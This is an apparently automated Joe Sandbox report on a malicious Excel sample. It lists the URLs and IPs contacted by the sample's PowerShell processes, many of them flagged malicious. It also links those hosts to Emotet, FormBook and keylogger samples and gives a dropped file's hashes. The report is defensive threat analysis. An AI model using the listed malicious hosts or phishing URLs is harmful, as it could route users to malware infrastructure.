https://c0.wp.com/c/6.6.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
http://sbcopylive.com.br3	powershell.exe, 00000009.00000002.511859762.0000000002702000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://schema.org	powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-1024x315.png	vbkwk.dll.5.dr	true	Avira URL Cloud: safe	unknown
http://actividades.laforetlangh	powershell.exe, 00000005.00000002.477673890.0000000003A9F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions-1536x359.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/wp-content/themes/trasix/js/parallax.js	powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www.parkinsons.co.in	powershell.exe, 00000005.00000002.477673890.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002752000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://trasix.com/modules/merchandizing/	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://c0.wp.com/p/woocommerce/9.3.3/assets/css/woocommerce-layout.css	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
https://schema.org/WPHeader	vbkwk.dll.5.dr	false		high
https://c0.wp.com/c/6.6.2/wp-includes/css/dist/block-library/style.min.css	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/uploads/2022/09/man.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.3	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://unpkg.com/swiper/swiper-bundle.min.js	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anugerahmasinternasional.co.id/comments/feed/	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://sbcopylive.com.brP	powershell.exe, 0000000D.00000002.515090897.0000000002752000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.3	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://daujimaharajmandir.org	powershell.exe, 00000005.00000002.477673890.000000000335C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.000000000299A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://datasits.com/wp-content/uploads/2022/09/vision.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01-32x32.png	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/man-300x300.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/teamwork-150x150.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/index.php?rest_route=/elementskit/v1/	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://yoast.com/wordpress/plugins/seo/	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anugerahmasinternasional.co.id/	powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=3.	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.24.	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/bussiness-man.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/elementor/css/post-8.css?ver=1726776442	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/index.php?rest_route=/wp/v2/pages/9	powershell.exe, 00000009.00000002.511859762.000000000281B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
http://cdn.jsinit.directfwd.com/sk-jspark_init.phpU	powershell.exe, 00000005.00000002.481391228.000000001A610000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ve	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.24.3	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/wp-content/themes/trasix/js/wow.min.js	powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.8.1	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
http://bruckevn.site	powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002837000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://pardiskood.com	powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002837000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/modules/digital-catalog/	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://parkinsons.co.in	powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://trasix.com/?s=	powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/woman-300x300.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://c0.wp.com/p/woocommerce/9.3.3/assets/js/frontend/woocommerce.min.js	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stats.wp.com/s-202445.js	powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.instagram.com/data.square.for.it.solutions/	vbkwk.dll.5.dr	false		high
https://datasits.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.3	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/?page_id=1229	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/bussiness-man-300x300.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://schema.org/WebPage	vbkwk.dll.5.dr	false		high
https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://trasix.com/wp-content/themes/trasix/images/abstract.png	powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/uploads/2022/09/Quality-150x150.png	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/?page_id=1130	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://anwaralbasateen.com	powershell.exe, 00000005.00000002.477673890.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.3	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
http://cdn.jsinit.directfwd.com/sk-jspark_init.php0	powershell.exe, 00000005.00000002.482303968.000000001E19E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.2	powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	false	Avira URL Cloud: safe	unknown
http://sbcopylive.com.br	powershell.exe, 00000005.00000002.477673890.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.177.124.30	biz.merlin.ua	Ukraine	20714	MERLIN-TELECOMUA	true
147.79.119.239	parkinsons.co.in	United States	208485	EKSENBILISIMTR	true
20.23.238.122	trasix.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
63.250.43.9	unknown	United States	22612	NAMECHEAP-NETUS	false
63.250.43.10	datasits.com	United States	22612	NAMECHEAP-NETUS	true
104.21.3.222	anugerahmasinternasional.co.id	United States	13335	CLOUDFLARENETUS	true
147.79.116.130	unknown	United States	208485	EKSENBILISIMTR	false
15.197.148.33	daujimaharajmandir.org	United States	7430	TANDEMUS	true
77.37.50.35	www.parkinsons.co.in.cdn.hstgr.net	Germany	31400	ACCELERATED-ITDE	false
147.79.119.141	unknown	United States	208485	EKSENBILISIMTR	false
207.174.214.153	anwaralbasateen.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
217.160.0.236	actividades.laforetlanguages.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
188.114.96.3	pardiskood.com	European Union	13335	CLOUDFLARENETUS	true
3.33.130.190	unknown	United States	8987	AMAZONEXPANSIONGB	false

Private

IP
192.168.2.255

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1551452
Start date and time:	2024-11-07 18:28:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xxTupY4Fr3.xlsx renamed because original name is a hash value
Original Sample Name:	de0e224114985b4c013485302d4008736612a023.xlsx
Detection:	MAL
Classification:	mal100.bank.troj.expl.evad.winXLSX@34/24@51/15
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 7 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .xlsx Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 3464 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: xxTupY4Fr3.xlsx

Simulations

Behavior and APIs

Time	Type	Description
12:29:01	API Interceptor	1389x Sleep call for process: powershell.exe modified
12:29:01	API Interceptor	1110x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
195.177.124.30	Inv WQ-5215.xls	Get hash	malicious	Unknown	Browse
63.250.43.9	http://moremashup.com	Get hash	malicious	Unknown	Browse	moremashup.com/
	http://www.selectscience.net/go/?itemID=79&itemTypeID=4&linkID=ctabutton&mailID=18205&email=%25EMAIL%25&URL=http%3A%2F%2Fsfydhgnsmbhnfsjda-diuhfcaecasvbc-79bc61.ingress-baronn.easywp.com%2Freview%3FcompetitionID%3D203%26utm_source%3DMembers%26utm_medium%3DReview-Email%26utm_campaign%3DReview-Club-March-2022#amltLm1jY29vbEBidW56bHVzYS5jb20=	Get hash	malicious	HTMLPhisher	Browse	sfydhgnsmbhnfsjda-diuhfcaecasvbc-79bc61.ingress-baronn.easywp.com/review?competitionID=203&utm_source=Members&utm_medium=Review-Email&utm_campaign=Review-Club-March-2022
	rocroc90909.exe	Get hash	malicious	FormBook	Browse	www.talkingcakes.xyz/rv12/?I6Ax6x=Ngj4dlkGwAKwgI7bbqWKcgEwFBjcntu4Wg9q2gFJo1nc4D58BbQdgsPkwwfzRGHE5aKY&jtxd0p=7nZPM
	sprogr.exe	Get hash	malicious	GuLoader FormBook	Browse	www.lovespotatoes.com/myec/?LN689n=gh_TCpB&TBZh=zWFnHAXhLkdIlJL+vCynItNgklaTehOBMitpwxpcEOxoRAoblJos0RHZmWWE/kabJNrh
63.250.43.10	ville21345.exe	Get hash	malicious	FormBook	Browse	www.talkingcakes.xyz/rv12/?9rYlEL=Ngj4dlkGwAKwgI7bbqWKcgEwFBjcntu4Wg9q2gFJo1nc4D58BbQdgsPkwwfzRGHE5aKY&H2=v2MX4XK0Hv

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
actividades.laforetlanguages.com	EGPPTCW5Fz.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	FYPfX4Ylya.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	DETALLES_1103.zls.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	report 8236.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	WCY_98100640.zls.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	FILE_052165.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	attachments-547184.xlsm	Get hash	malicious	Hidden Macro 4.0 Emotet	Browse	217.160.0.236
	Inv WQ-5215.xls	Get hash	malicious	Unknown	Browse	217.160.0.236
biz.merlin.ua	Inv WQ-5215.xls	Get hash	malicious	Unknown	Browse	195.177.124.30
pardiskood.com	Inv WQ-5215.xls	Get hash	malicious	Unknown	Browse	178.33.254.162
datasits.com	Inv WQ-5215.xls	Get hash	malicious	Unknown	Browse	75.119.139.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	RO2Y11yOJ7.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	xBzBOQwywT.exe	Get hash	malicious	FormBook	Browse	199.192.19.19
	https://google.com:login@login-zendesk-account.servz.com.pk/index.html	Get hash	malicious	HTMLPhisher	Browse	63.250.47.132
	gTg6xY6fo2.exe	Get hash	malicious	FormBook	Browse	162.0.225.218
	ByuoedHi2e.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	Y7isAhMKal.exe	Get hash	malicious	FormBook	Browse	162.0.231.203
EKSENBILISIMTR	https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0	Get hash	malicious	Unknown	Browse	147.79.74.176
	https://pub-535a4999ab4b4c1e81647bad9b888e40.r2.dev/onedrivefresh.html	Get hash	malicious	Unknown	Browse	147.79.74.176
	https://merzcon-my.sharepoint.com/:f:/g/personal/cnico_merzcon_onmicrosoft_com/EmjHG5K9dP9BtgBBeTTFhjABJRRLGM6IhVrJlwBTMWY8rg?e=pfkS1f	Get hash	malicious	Unknown	Browse	147.79.74.176
	https://netorg11230081-my.sharepoint.com/:f:/g/personal/info_onafastpacecontracting_com/Eoa77Lo8BXlOut3qDNQUDAQBBgmgCvIALxhAXrlqjk9Asw?e=2UKAY6	Get hash	malicious	Unknown	Browse	147.79.74.176
	Ziraat Bankasi Swift Mesaji_20241003_3999382.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe	Get hash	malicious	RedLine, Xmrig	Browse	45.133.36.107
MERLIN-TELECOMUA	Inv WQ-5215.xls	Get hash	malicious	Unknown	Browse	195.177.124.30
	gBrzoN9gj7	Get hash	malicious	Unknown	Browse	31.128.237.1
	v9MzRABIYp	Get hash	malicious	Mirai	Browse	31.128.224.4
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQ	Get hash	malicious	Unknown	Browse	150.171.28.10
	vMRlWtVCEN.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	c54f4c04-95c8-e3ea-7c13-45cbc3ee9b45.eml	Get hash	malicious	Unknown	Browse	52.109.76.243
	Multi Graphics Inc CustomerVendor Form.pdf	Get hash	malicious	HTMLPhisher	Browse	20.75.106.146
	https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkG	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://app.smartsheet.com/b/form/d72b00b027df4e38a9b052ac176790d8	Get hash	malicious	Unknown	Browse	13.107.246.45
	byte.ppc.elf	Get hash	malicious	Mirai, Okiru	Browse	20.94.231.231
	byte.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	20.92.180.39
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS5d7c8770636a4f3fd2ed2ec05584079425wDnNeW8yycT&sa=t&esrc=nNeW8F5d7c8770636a4f3fd2ed2ec05584079425A0xys8Em2FL&source=&cd=tS6T85d7c8770636a4f3fd2ed2ec05584079425Tiw9XH&cad=XpPkDfJX5d7c8770636a4f3fd2ed2ec05584079425VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fbyda.ng%2Fcig.bin%2Fgoin%2F%23c2VjcmV0YXJpYXRAcGVvLm9uLmNh	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.253.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	ZF3dxapdNLa4lNL.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	ConfirmaciXnXdeXfacturaXPedidoXadicional.doc	Get hash	malicious	Unknown	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	Purchase order.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	Product_Samples.doc	Get hash	malicious	DarkTortilla, XWorm	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	KSACURFQAAB01.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	Payment Advice-RefA22D4YdWsbE56.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	aviso de transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	xBA TM06-Q6-11-24.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130
	Payment Advice-RefA22D4YdWsbE5.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	15.197.148.33 77.37.50.35 20.23.238.122 207.174.214.153 63.250.43.9 188.114.96.3 104.21.3.222 3.33.130.190 147.79.116.130

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with very long lines (2957), with CRLF line terminators
Category:	dropped
Size (bytes):	3228
Entropy (8bit):	4.97417285451692
Encrypted:	false
SSDEEP:	96:kpe/HxKHmEgyaRAWepxCgQAFmaYPvA7kApIh4ojofJ3oHSIpH5t/:kpe/HYHmEgyaTepxNLma0OzIhkhONpZB
MD5:	E869DD1A602A7F0CBBEFB7A018CD1253
SHA1:	5608819D8D30BEB899BF048B1E332BF1C15E1129
SHA-256:	23552B48EE1A0953DCF2AA698A8210E55B9D0E356418A8DE4122C2223B005208
SHA-512:	099B2CC685A9C3F7A789A91BAFF6E9207C90F80D3A97F2102C98CD50B6DB1F447729BE96AA5F623730FEF4C8F219FABC1B6CF096465ED32F4E77D23743869D61
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
